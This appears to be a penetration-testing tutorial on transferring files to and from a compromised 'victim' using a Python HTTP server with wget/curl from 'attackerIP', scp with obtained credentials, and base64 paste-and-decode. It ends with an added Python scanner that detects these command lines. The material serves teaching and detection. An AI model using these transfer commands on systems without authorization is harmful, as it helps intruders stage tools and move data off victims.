Transferring files to/from remote victim
Once we have compromised a system, we can use different methods to transfer files to or from the victim, depending on the situation.
Using wget or cURL
If the compromised victim has sufficient privileges to download files, we can use wget or curl to copy a file from our own machine. First go into the directory that contains the file you want to transfer and run a simple Python HTTP server there with:
cd /transferDirectory
python3 -m http.server 8080 # 8080 is an example port; use any free port
Now that the server is listening on port 8080 on our machine, download the file on the victim (where we have code execution) with:
wget http://attackerIP:8080/file
or
curl http://attackerIP:8080/file -o newNameFile
It can also work the other way round: run the HTTP server on the victim (if it has Python installed) and download from the attacker machine via wget/curl.
Using SSH file transfer SCP
If we have obtained SSH credentials, we can use SCP to transfer files directly from our attacking machine to the victim:
scp /local/dir/fileX user@IP:/remote/dir/fileX
Using Base64
If you are not able to transfer files directly, for example because the firewall prevents the victim from downloading files, you can use the base64 trick.
It consists of encoding the file in base64 without line breaks (-w 0) so that the whole file can be copied as a single line of text:
base64 fileX -w 0
Then paste the result on the compromised machine with:
echo d2hhdCBhcmUgeW9 ... 1IGxvb2tpbmcgYXQg | base64 -d > fileX
To validate that the file transferred correctly, we can compare the MD5 hash of the original file with that of the file pasted on the victim system:
md5sum fileX
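Each of these transfers leaves a recognisable command line in shell history or process telemetry. The following is an added example, not part of the original page: a small Python scanner that flags the ad-hoc HTTP server, a wget/curl fetch from a raw IP address and the base64 paste-and-decode, and classifies the decoded payload by its leading bytes. The rule names, the 40-character blob threshold and the sample lines are assumptions made for illustration.

```python
import base64
import re

# Patterns for the transfer techniques on this page, matched against shell
# command lines (shell history, auditd execve records, EDR process events).
# The 40-character minimum for an inline blob is an assumed threshold.
RULES = {
    "adhoc-http-server": re.compile(
        r"\bpython\d?(?:\.\d+)?\s+-m\s+(?:http\.server|SimpleHTTPServer)\b"),
    "http-fetch-raw-ip": re.compile(
        r"\b(?:wget|curl)\b.*?https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?/"),
    "base64-paste-decode": re.compile(
        r"\becho\s+['\"]?([A-Za-z0-9+/]{40,}={0,2})['\"]?\s*\|\s*base64\s+(?:-d|--decode)\b"),
}
MAGIC = [(b"\x7fELF", "ELF binary"), (b"MZ", "PE binary"), (b"#!", "script with shebang")]

def payload_kind(blob):
    """Decode an inline base64 blob and classify it by its leading bytes."""
    try:
        data = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return "undecodable"
    for magic, name in MAGIC:
        if data.startswith(magic):
            return name
    return "other (%d bytes)" % len(data)

def scan(lines):
    """Return (line_number, rule, detail) for each command line that matches."""
    hits = []
    for n, line in enumerate(lines, 1):
        for rule, rx in RULES.items():
            m = rx.search(line)
            if m:
                detail = payload_kind(m.group(1)) if rule == "base64-paste-decode" else m.group(0)
                hits.append((n, rule, detail))
    return hits

# Constructed sample command lines (documentation address, made-up file names).
SAMPLE = [
    "python3 -m http.server 8080",
    "wget http://192.0.2.10:8080/file",
    "curl https://example.org/install.sh -o install.sh",
    "echo " + base64.b64encode(b"\x7fELF" + bytes(60)).decode() + " | base64 -d > fileX",
    "base64 notes.txt -w 0",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```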